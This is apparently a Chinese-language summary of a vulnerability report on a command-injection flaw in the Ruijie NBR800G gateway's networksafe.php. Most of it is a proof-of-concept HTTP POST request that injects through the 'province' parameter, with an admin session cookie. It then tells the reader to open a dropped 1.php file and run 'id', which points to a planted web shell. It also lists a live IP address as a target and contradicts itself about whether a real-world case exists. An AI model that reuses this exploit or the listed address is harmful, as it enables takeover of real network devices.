从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞名称:Ruijie NBR800G gateway has command execution vulnerability 2. 制造商地址:[https://222.170.147.52:4430/] 3. 漏洞影响: - Ruijie NBR800G gateway NBR_RGOS_11.1(6)B4P9 4. 漏洞位置: - /itbox_pi/networksafe.php 5. 漏洞细节: - Ruijie Networks是一家专业网络设备制造商,包括交换机、路由器、软件、安全防火墙、无线产品、存储等。 - Ruijie NBR800G gateway存在命令执行漏洞。攻击者可以通过该漏洞获得服务器权限,导致服务器崩溃。 - 这个漏洞是代码审计的结果,没有提供互联网案例。详细的代码分析步骤和部分漏洞源代码在文档中作为参考。 6. 漏洞验证: - 代码分析: - 省份参数可控,通过拼接导致命令执行。 - 本地重现: - 登录界面 - 产品版本证书 - POC: - POST /itbox_pi/networksafe.php?a=list HTTP/1.1 - Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=vh60slsfgs4krrhfqhh0h6f31; user=admin - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/q=0.8 - Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 - Accept-Encoding: gzip, deflate, br - Upgrade-Insecure-Requests: 1 - Sec-Fetch-Dest: document - Sec-Fetch-Mode: navigate - Sec-Fetch-Site: none - Sec-Fetch-User: ?1 - X-Forwarded-For: 192.168.12.3 - If-Modified-Since: Tue, 04 Jul 2017 08:28:20 GMT - Priority: u=0, i - Te: trailers - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 25 - province= - 访问 /itbox_pi/1.php 并执行 id - 提供了真实案例验证。 这些信息详细描述了Ruijie NBR800G gateway的命令执行漏洞,包括漏洞的触发条件、验证方法和POC示例。